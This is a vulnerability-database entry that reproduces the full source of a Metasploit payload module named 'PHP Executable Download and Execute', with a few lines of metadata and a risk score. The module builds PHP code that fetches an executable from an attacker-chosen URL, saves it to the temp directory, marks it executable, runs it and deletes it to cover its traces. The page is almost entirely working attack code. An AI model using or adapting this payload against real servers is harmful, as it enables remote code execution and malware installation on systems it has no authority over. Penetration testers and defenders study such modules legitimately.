PHP Executable Download and Execute

26 Jul 2009 23:08:31
Reported by: egypt
Type: metasploit
Source: www.rapid7.com

PHP Executable Download and Execute - Module for downloading and executing an EXE file via PHP cod

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


module MetasploitModule

  CachedSize = :dynamic

  include Msf::Payload::Php
  include Msf::Payload::Single

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'PHP Executable Download and Execute',
      'Description'   => 'Download an EXE from an HTTP URL and execute it',
      'Author'        => [ 'egypt' ],
      'License'       => BSD_LICENSE,
      'Platform'      => 'php',
      'Arch'          => ARCH_PHP,
      'Privileged'    => false
      ))

    # EXITFUNC is not supported :/
    deregister_options('EXITFUNC')

    # Register command execution options
    register_options(
      [
        OptString.new('URL', [ true, "The pre-encoded URL to the executable" ])
      ])
  end

  def php_exec_file
    exename = Rex::Text.rand_text_alpha(rand(8) + 4)
    dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
    shell = <<-END_OF_PHP_CODE
    #{php_preamble(disabled_varname: dis)}
    if (!function_exists('sys_get_temp_dir')) {
      function sys_get_temp_dir() {
        if (!empty($_ENV['TMP'])) { return realpath($_ENV['TMP']); }
        if (!empty($_ENV['TMPDIR'])) { return realpath($_ENV['TMPDIR']); }
        if (!empty($_ENV['TEMP'])) { return realpath($_ENV['TEMP']); }
        $tempfile=tempnam(uniqid(rand(),TRUE),'');
        if (file_exists($tempfile)) {
          @unlink($tempfile);
          return realpath(dirname($tempfile));
        }
        return null;
      }
    }
    $fname = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "#{exename}.exe";
    $fd_in = fopen("#{datastore['URL']}", "rb");
    if ($fd_in === false) { die(); }
    $fd_out = fopen($fname, "wb");
    if ($fd_out === false) { die(); }
    while (!feof($fd_in)) {
      fwrite($fd_out, fread($fd_in, 8192));
    }
    fclose($fd_in);
    fclose($fd_out);
    chmod($fname, 0777);
    $c = $fname;
    #{php_system_block(cmd_varname: "$c", disabled_varname: dis)}
    @unlink($fname);
    END_OF_PHP_CODE

    #return Rex::Text.compress(shell)
    return shell
  end

  #
  # Constructs the payload
  #
  def generate(_opts = {})
    return php_exec_file
  end
end

04 Nov 2022 02:10 (current)
Vulners AI Score: 7.3 (High risk)